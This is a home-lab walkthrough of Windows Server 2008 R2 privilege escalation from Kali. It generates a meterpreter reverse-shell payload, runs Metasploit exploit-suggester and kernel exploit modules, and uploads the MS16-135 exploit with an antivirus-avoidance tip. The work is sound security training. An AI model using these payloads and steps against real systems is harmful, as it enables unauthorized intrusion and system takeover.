🔬 Home Lab
I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network of the Kali virtual machine.
Host system: Kali Linux
- IP 192.168.31.128
Target system: Windown Server 2008 R2
- IP 192.168.31.131
- test
:Exploit12345
❗ Targeting Kernel space memory and apps can cause system crashes, data loss, etc. Do NOT use it in production systems ❗
Copy msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= 192.168.31.128 LPORT= 4444 -f exe -o payload.exe
Copy use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 4444
run
Local Privilege Escalation
Copy # From the meterpreter session
sessions 7
getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
getsystem
[-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin )
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin )
[-] Named Pipe Impersonation (RPCSS variant )
[-] Named Pipe Impersonation (PrintSpooler variant )
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato )
# failed
Copy background
search suggester
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 7
run
Copy # Exploitable vulnerabilities modules
exploit/windows/local/bypassuac_dotnet_profiler
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sdclt
exploit/windows/local/cve_2019_1458_wizardopium
exploit/windows/local/cve_2020_1054_drawiconex_lpe
exploit/windows/local/ms10_092_schelevator
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms15_051_client_copy_image
exploit/windows/local/ms16_014_wmi_recv_notif
Copy use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422
exploit
Manual Privilege Escalation
Copy sessions 7
shell
systeminfo
Copy systeminfo
Host Name: WINSRV2008
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00477-001-0000421-84620
Original Install Date: 14/03/2023, 17:23:02
System Boot Time: 15/03/2023, 15:31:32
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s ): 1 Processor( s ) Installed.
[01] : Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~4200 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C: \W indows
System Directory: C: \W indows \s ystem32
Boot Device: \D evice \H arddiskVolume1
System Locale: it ; Italian (Italy)
Input Locale: it ; Italian (Italy)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.391 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.399 MB
Virtual Memory: In Use: 696 MB
Page File Location ( s ) : C: \p agefile.sys
Domain: WORKGROUP
Logon Server: \\ WINSRV2008
Hotfix(s ): 3 Hotfix( s ) Installed.
[01] : KB2999226
[02] : KB3033929
[03] : KB976902
Network Card ( s ) : 1 NIC ( s ) Installed.
[01] : Intel ( R ) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address ( es )
[01] : 192.168.31.131
[02] : fe80::9934:6f8a:fd0c:bba4
Windows-Exploit-Suggester
Copy mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script
cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
[ * ] initiating winsploit version 3.3...
[+] writing to file 2023-03-15-mssb.xls
[ * ] done
pip install xlrd --upgrade
Copy ./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt
Copy [E]MS16-135: Security Update for Windows Kernel-Mode Drivers ( 3199135 ) - Important
[ * ] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service ( MS16-135 )
[ * ] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation ( MS16-135 ) ( 2 )
[ * ] https://github.com/tinysec/public/tree/master/CVE-2016-7255
Copy cd C: \\
mkdir temp
cd temp \\
# Reduce the likelihood of antivirus detection by using the temp directory
upload 41015.exe
shell
. \ 41015.exe 7
🧪 I have tried to copy the exploit file to my protected Windows host. Antivirus will detect the Exploit file, so pay attention.
VirusTotal Analysis